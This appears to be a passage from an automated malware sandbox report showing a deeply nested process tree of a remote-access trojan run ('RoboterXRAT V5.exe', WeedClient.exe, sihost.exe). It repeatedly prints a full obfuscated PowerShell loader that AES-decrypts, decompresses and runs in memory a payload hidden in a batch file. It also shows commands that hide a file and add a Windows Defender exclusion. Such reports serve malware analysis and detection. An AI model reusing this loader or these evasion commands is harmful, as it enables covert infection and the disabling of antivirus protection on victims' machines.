$UgPla=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $XTeIB=$UgPla.EntryPoint; $XTeIB.Invoke($null, $param2_var);}$GZyeB = 'C:\Users\Admin\AppData\Local\Temp\cxc.bat';$host.UI.RawUI.WindowTitle = $GZyeB;$nPQuF=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($GZyeB).Split([Environment]::NewLine);foreach ($pSPiG in $nPQuF) { if ($pSPiG.StartsWith(':: ')) { $qzahh=$pSPiG.Substring(3); break; }}$payloads_var=[string[]]$qzahh.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
        55⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:2552
        
        C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe"
        54⤵
        
        PID:2376
        
        C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe"
        55⤵
        
        PID:888
        
        C:\Users\Admin\AppData\Local\Temp\WeedClient.exe
        
        "C:\Users\Admin\AppData\Local\Temp\WeedClient.exe"
        55⤵
        
        PID:2412
        
        C:\Users\Admin\AppData\Local\Temp\sihost.exe
        
        "C:\Users\Admin\AppData\Local\Temp\sihost.exe"
        55⤵
        
        PID:2200
        
        C:\Windows\system32\cmd.exe
        
        cmd /c ""C:\Users\Admin\AppData\Local\Temp\cxc.bat" "
        53⤵
        
        PID:868
        
        C:\Windows\system32\net.exe
        
        net file
        54⤵
        
        PID:2232
        
        C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 file
        55⤵
        
        PID:628
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('B+SBb9nMlcptedLlwHls5n3zB58QaIA6RJiD5dfgWIk='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('XAHyUi12Hi0GcaikprpE4Q=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $AVtQZ=New-Object System.IO.MemoryStream(,$param_var); $puhlZ=New-Object System.IO.MemoryStream; $bnJJi=New-Object System.IO.Compression.GZipStream($AVtQZ, [IO.Compression.CompressionMode]::Decompress); $bnJJi.CopyTo($puhlZ); $bnJJi.Dispose(); $AVtQZ.Dispose(); $puhlZ.Dispose(); $puhlZ.ToArray();}function execute_function($param_var,$param2_var){ $UgPla=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $XTeIB=$UgPla.EntryPoint; $XTeIB.Invoke($null, $param2_var);}$GZyeB = 'C:\Users\Admin\AppData\Local\Temp\cxc.bat';$host.UI.RawUI.WindowTitle = $GZyeB;$nPQuF=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($GZyeB).Split([Environment]::NewLine);foreach ($pSPiG in $nPQuF) { if ($pSPiG.StartsWith(':: ')) { $qzahh=$pSPiG.Substring(3); break; }}$payloads_var=[string[]]$qzahh.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
        54⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:2544
        
        C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe"
        53⤵
        
        PID:2700
        
        C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe"
        54⤵
        
        PID:612
        
        C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe"
        55⤵
        
        PID:1840
        
        C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe"
        56⤵
        
        PID:2284
        
        C:\Users\Admin\AppData\Local\Temp\WeedClient.exe
        
        "C:\Users\Admin\AppData\Local\Temp\WeedClient.exe"
        56⤵
        
        PID:2852
        
        C:\Users\Admin\AppData\Local\Temp\sihost.exe
        
        "C:\Users\Admin\AppData\Local\Temp\sihost.exe"
        56⤵
        
        PID:2308
        
        C:\Users\Admin\AppData\Local\Temp\WeedClient.exe
        
        "C:\Users\Admin\AppData\Local\Temp\WeedClient.exe"
        55⤵
        
        PID:1804
        
        C:\Users\Admin\AppData\Local\Temp\sihost.exe
        
        "C:\Users\Admin\AppData\Local\Temp\sihost.exe"
        55⤵
        
        PID:2860
        
        C:\Users\Admin\AppData\Local\Temp\WeedClient.exe
        
        "C:\Users\Admin\AppData\Local\Temp\WeedClient.exe"
        54⤵
        
        PID:2684
        
        C:\Users\Admin\AppData\Local\Temp\sihost.exe
        
        "C:\Users\Admin\AppData\Local\Temp\sihost.exe"
        54⤵
        
        PID:1560
        
        C:\Windows\system32\cmd.exe
        
        cmd /c ""C:\Users\Admin\AppData\Local\Temp\cxc.bat" "
        52⤵
        
        PID:2568
        
        C:\Windows\system32\net.exe
        
        net file
        53⤵
        
        PID:2092
        
        C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 file
        54⤵
        
        PID:2460
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('B+SBb9nMlcptedLlwHls5n3zB58QaIA6RJiD5dfgWIk='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('XAHyUi12Hi0GcaikprpE4Q=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $AVtQZ=New-Object System.IO.MemoryStream(,$param_var); $puhlZ=New-Object System.IO.MemoryStream; $bnJJi=New-Object System.IO.Compression.GZipStream($AVtQZ, [IO.Compression.CompressionMode]::Decompress); $bnJJi.CopyTo($puhlZ); $bnJJi.Dispose(); $AVtQZ.Dispose(); $puhlZ.Dispose(); $puhlZ.ToArray();}function execute_function($param_var,$param2_var){ $UgPla=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $XTeIB=$UgPla.EntryPoint; $XTeIB.Invoke($null, $param2_var);}$GZyeB = 'C:\Users\Admin\AppData\Local\Temp\cxc.bat';$host.UI.RawUI.WindowTitle = $GZyeB;$nPQuF=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($GZyeB).Split([Environment]::NewLine);foreach ($pSPiG in $nPQuF) { if ($pSPiG.StartsWith(':: ')) { $qzahh=$pSPiG.Substring(3); break; }}$payloads_var=[string[]]$qzahh.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
        53⤵
        
        PID:2456
        
        C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe"
        52⤵
        
        PID:2256
        
        C:\Windows\system32\cmd.exe
        
        cmd /c ""C:\Users\Admin\AppData\Local\Temp\cxc.bat" "
        51⤵
        
        PID:1800
        
        C:\Windows\system32\net.exe
        
        net file
        52⤵
        
        PID:2576
        
        C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 file
        53⤵
        
        PID:2020
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('B+SBb9nMlcptedLlwHls5n3zB58QaIA6RJiD5dfgWIk='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('XAHyUi12Hi0GcaikprpE4Q=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $AVtQZ=New-Object System.IO.MemoryStream(,$param_var); $puhlZ=New-Object System.IO.MemoryStream; $bnJJi=New-Object System.IO.Compression.GZipStream($AVtQZ, [IO.Compression.CompressionMode]::Decompress); $bnJJi.CopyTo($puhlZ); $bnJJi.Dispose(); $AVtQZ.Dispose(); $puhlZ.Dispose(); $puhlZ.ToArray();}function execute_function($param_var,$param2_var){ $UgPla=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $XTeIB=$UgPla.EntryPoint; $XTeIB.Invoke($null, $param2_var);}$GZyeB = 'C:\Users\Admin\AppData\Local\Temp\cxc.bat';$host.UI.RawUI.WindowTitle = $GZyeB;$nPQuF=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($GZyeB).Split([Environment]::NewLine);foreach ($pSPiG in $nPQuF) { if ($pSPiG.StartsWith(':: ')) { $qzahh=$pSPiG.Substring(3); break; }}$payloads_var=[string[]]$qzahh.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
        52⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:2088
        
        C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe"
        51⤵
        
        PID:2116
        
        C:\Windows\system32\cmd.exe
        
        cmd /c ""C:\Users\Admin\AppData\Local\Temp\cxc.bat" "
        50⤵
        
        PID:1488
        
        C:\Windows\system32\net.exe
        
        net file
        51⤵
        
        PID:3064
        
        C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 file
        52⤵
        
        PID:2632
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('B+SBb9nMlcptedLlwHls5n3zB58QaIA6RJiD5dfgWIk='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('XAHyUi12Hi0GcaikprpE4Q=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $AVtQZ=New-Object System.IO.MemoryStream(,$param_var); $puhlZ=New-Object System.IO.MemoryStream; $bnJJi=New-Object System.IO.Compression.GZipStream($AVtQZ, [IO.Compression.CompressionMode]::Decompress); $bnJJi.CopyTo($puhlZ); $bnJJi.Dispose(); $AVtQZ.Dispose(); $puhlZ.Dispose(); $puhlZ.ToArray();}function execute_function($param_var,$param2_var){ $UgPla=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $XTeIB=$UgPla.EntryPoint; $XTeIB.Invoke($null, $param2_var);}$GZyeB = 'C:\Users\Admin\AppData\Local\Temp\cxc.bat';$host.UI.RawUI.WindowTitle = $GZyeB;$nPQuF=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($GZyeB).Split([Environment]::NewLine);foreach ($pSPiG in $nPQuF) { if ($pSPiG.StartsWith(':: ')) { $qzahh=$pSPiG.Substring(3); break; }}$payloads_var=[string[]]$qzahh.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
        51⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:2412
        
        C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe"
        50⤵
        
        PID:2648
        
        C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe"
        51⤵
        
        PID:1544
        
        C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe"
        52⤵
        
        PID:1116
        
        C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe"
        53⤵
        
        PID:1720
        
        C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe"
        54⤵
        
        PID:2360
        
        C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe"
        55⤵
        
        PID:2916
        
        C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe"
        56⤵
        
        PID:2708
        
        C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe"
        57⤵
        
        PID:2536
        
        C:\Users\Admin\AppData\Local\Temp\WeedClient.exe
        
        "C:\Users\Admin\AppData\Local\Temp\WeedClient.exe"
        57⤵
        
        PID:2300
        
        C:\Users\Admin\AppData\Local\Temp\sihost.exe
        
        "C:\Users\Admin\AppData\Local\Temp\sihost.exe"
        57⤵
        
        PID:1484
        
        C:\Users\Admin\AppData\Local\Temp\WeedClient.exe
        
        "C:\Users\Admin\AppData\Local\Temp\WeedClient.exe"
        56⤵
        
        PID:1636
        
        C:\Users\Admin\AppData\Local\Temp\sihost.exe
        
        "C:\Users\Admin\AppData\Local\Temp\sihost.exe"
        56⤵
        
        PID:1732
        
        C:\Users\Admin\AppData\Local\Temp\WeedClient.exe
        
        "C:\Users\Admin\AppData\Local\Temp\WeedClient.exe"
        55⤵
        
        PID:2816
        
        C:\Users\Admin\AppData\Local\Temp\sihost.exe
        
        "C:\Users\Admin\AppData\Local\Temp\sihost.exe"
        55⤵
        
        PID:2116
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" csproduct get uuid
        56⤵
        
        PID:480
        
        C:\Windows\system32\attrib.exe
        
        "attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\sihost.exe"
        56⤵
        Views/modifies file attributes
        
        PID:1624
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\sihost.exe'
        56⤵
        
        PID:884
        
        C:\Users\Admin\AppData\Local\Temp\WeedClient.exe
        
        "C:\Users\Admin\AppData\Local\Temp\WeedClient.exe"
        54⤵
        
        PID:1580
        
        C:\Users\Admin\AppData\Local\Temp\sihost.exe
        
        "C:\Users\Admin\AppData\Local\Temp\sihost.exe"
        54⤵
        
        PID:532
        
        C:\Users\Admin\AppData\Local\Temp\WeedClient.exe
        
        "C:\Users\Admin\AppData\Local\Temp\WeedClient.exe"
        53⤵
        
        PID:1132
        
        C:\Users\Admin\AppData\Local\Temp\sihost.exe
        
        "C:\Users\Admin\AppData\Local\Temp\sihost.exe"
        53⤵
        
        PID:928
        
        C:\Users\Admin\AppData\Local\Temp\WeedClient.exe
        
        "C:\Users\Admin\AppData\Local\Temp\WeedClient.exe"
        52⤵
        
        PID:1692
        
        C:\Users\Admin\AppData\Local\Temp\sihost.exe
        
        "C:\Users\Admin\AppData\Local\Temp\sihost.exe"
        52⤵
        
        PID:2544
        
        C:\Users\Admin\AppData\Local\Temp\WeedClient.exe
        
        "C:\Users\Admin\AppData\Local\Temp\WeedClient.exe"
        51⤵
        
        PID:2416
        
        C:\Users\Admin\AppData\Local\Temp\sihost.exe
        
        "C:\Users\Admin\AppData\Local\Temp\sihost.exe"
        51⤵
        
        PID:1664
        
        C:\Windows\system32\cmd.exe
        
        cmd /c ""C:\Users\Admin\AppData\Local\Temp\cxc.bat" "
        49⤵
        
        PID:1268
        
        C:\Windows\system32\net.exe
        
        net file
        50⤵
        
        PID:2720
        
        C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 file
        51⤵
        
        PID:2340
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('B+SBb9nMlcptedLlwHls5n3zB58QaIA6RJiD5dfgWIk='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('XAHyUi12Hi0GcaikprpE4Q=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $AVtQZ=New-Object System.IO.MemoryStream(,$param_var); $puhlZ=New-Object System.IO.MemoryStream; $bnJJi=New-Object System.IO.Compression.GZipStream($AVtQZ, [IO.Compression.CompressionMode]::Decompress); $bnJJi.CopyTo($puhlZ); $bnJJi.Dispose(); $AVtQZ.Dispose(); $puhlZ.Dispose(); $puhlZ.ToArray();}function execute_function($param_var,$param2_var){ $UgPla=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $XTeIB=$UgPla.EntryPoint; $XTeIB.Invoke($null, $param2_var);}$GZyeB = 'C:\Users\Admin\AppData\Local\Temp\cxc.bat';$host.UI.RawUI.WindowTitle = $GZyeB;$nPQuF=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($GZyeB).Split([Environment]::NewLine);foreach ($pSPiG in $nPQuF) { if ($pSPiG.StartsWith(':: ')) { $qzahh=$pSPiG.Substring(3); break; }}$payloads_var=[string[]]$qzahh.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
        50⤵
        
        PID:2900
        
        C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe"
        49⤵
        
        PID:1776
        
        C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe"
        50⤵
        
        PID:2636
        
        C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe"
        51⤵
        
        PID:2000
        
        C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe"
        52⤵
        
        PID:2212
        
        C:\Users\Admin\AppData\Local\Temp\WeedClient.exe
        
        "C:\Users\Admin\AppData\Local\Temp\WeedClient.exe"
        52⤵
        
        PID:2708
        
        C:\Users\Admin\AppData\Local\Temp\sihost.exe
        
        "C:\Users\Admin\AppData\Local\Temp\sihost.exe"
        52⤵
        
        PID:2692
        
        C:\Users\Admin\AppData\Local\Temp\WeedClient.exe
        
        "C:\Users\Admin\AppData\Local\Temp\WeedClient.exe"
        51⤵
        
        PID:2752
        
        C:\Users\Admin\AppData\Local\Temp\sihost.exe
        
        "C:\Users\Admin\AppData\Local\Temp\sihost.exe"
        51⤵
        
        PID:1268
        
        C:\Users\Admin\AppData\Local\Temp\WeedClient.exe
        
        "C:\Users\Admin\AppData\Local\Temp\WeedClient.exe"
        50⤵
        
        PID:2688
        
        C:\Users\Admin\AppData\Local\Temp\sihost.exe
        
        "C:\Users\Admin\AppData\Local\Temp\sihost.exe"
        50⤵
        
        PID:952
        
        C:\Windows\system32\cmd.exe
        
        cmd /c ""C:\Users\Admin\AppData\Local\Temp\cxc.bat" "
        48⤵
        
        PID:1660
        
        C:\Windows\system32\net.exe
        
        net file
        49⤵
        
        PID:1396
        
        C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 file
        50⤵
        
        PID:1748
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('B+SBb9nMlcptedLlwHls5n3zB58QaIA6RJiD5dfgWIk='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('XAHyUi12Hi0GcaikprpE4Q=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $AVtQZ=New-Object System.IO.MemoryStream(,$param_var); $puhlZ=New-Object System.IO.MemoryStream; $bnJJi=New-Object System.IO.Compression.GZipStream($AVtQZ, [IO.Compression.CompressionMode]::Decompress); $bnJJi.CopyTo($puhlZ); $bnJJi.Dispose(); $AVtQZ.Dispose(); $puhlZ.Dispose(); $puhlZ.ToArray();}function execute_function($param_var,$param2_var){ $UgPla=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $XTeIB=$UgPla.EntryPoint; $XTeIB.Invoke($null, $param2_var);}$GZyeB = 'C:\Users\Admin\AppData\Local\Temp\cxc.bat';$host.UI.RawUI.WindowTitle = $GZyeB;$nPQuF=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($GZyeB).Split([Environment]::NewLine);foreach ($pSPiG in $nPQuF) { if ($pSPiG.StartsWith(':: ')) { $qzahh=$pSPiG.Substring(3); break; }}$payloads_var=[string[]]$qzahh.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
        49⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:572
        
        C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe"
        48⤵
        
        PID:2456
        
        C:\Windows\system32\cmd.exe
        
        cmd /c ""C:\Users\Admin\AppData\Local\Temp\cxc.bat" "
        47⤵
        
        PID:3016
        
        C:\Windows\system32\net.exe
        
        net file
        48⤵
        
        PID:1988
        
        C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 file
        49⤵
        
        PID:3036
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('B+SBb9nMlcptedLlwHls5n3zB58QaIA6RJiD5dfgWIk='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('XAHyUi12Hi0GcaikprpE4Q=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $AVtQZ=New-Object System.IO.MemoryStream(,$param_var); $puhlZ=New-Object System.IO.MemoryStream; $bnJJi=New-Object System.IO.Compression.GZipStream($AVtQZ, [IO.Compression.CompressionMode]::Decompress); $bnJJi.CopyTo($puhlZ); $bnJJi.Dispose(); $AVtQZ.Dispose(); $puhlZ.Dispose(); $puhlZ.ToArray();}function execute_function($param_var,$param2_var){ $UgPla=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $XTeIB=$UgPla.EntryPoint; $XTeIB.Invoke($null, $param2_var);}$GZyeB = 'C:\Users\Admin\AppData\Local\Temp\cxc.bat';$host.UI.RawUI.WindowTitle = $GZyeB;$nPQuF=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($GZyeB).Split([Environment]::NewLine);foreach ($pSPiG in $nPQuF) { if ($pSPiG.StartsWith(':: ')) { $qzahh=$pSPiG.Substring(3); break; }}$payloads_var=[string[]]$qzahh.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
        48⤵
        
        PID:2892
        
        C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe"
        47⤵
        
        PID:2884
        
        C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe"
        48⤵
        
        PID:2260
        
        C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe"
        49⤵
        
        PID:2296
        
        C:\Users\Admin\AppData\Local\Temp\WeedClient.exe
        
        "C:\Users\Admin\AppData\Local\Temp\WeedClient.exe"
        49⤵
        
        PID:592
        
        C:\Users\Admin\AppData\Local\Temp\sihost.exe
        
        "C:\Users\Admin\AppData\Local\Temp\sihost.exe"
        49⤵
        
        PID:2368
        
        C:\Users\Admin\AppData\Local\Temp\WeedClient.exe
        
        "C:\Users\Admin\AppData\Local\Temp\WeedClient.exe"
        48⤵
        
        PID:1908
        
        C:\Users\Admin\AppData\Local\Temp\sihost.exe
        
        "C:\Users\Admin\AppData\Local\Temp\sihost.exe"
        48⤵
        
        PID:2720
        
        C:\Windows\system32\cmd.exe
        
        cmd /c ""C:\Users\Admin\AppData\Local\Temp\cxc.bat" "
        46⤵
        
        PID:1740
        
        C:\Windows\system32\net.exe
        
        net file
        47⤵
        
        PID:852
        
        C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 file
        48⤵
        
        PID:2544
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
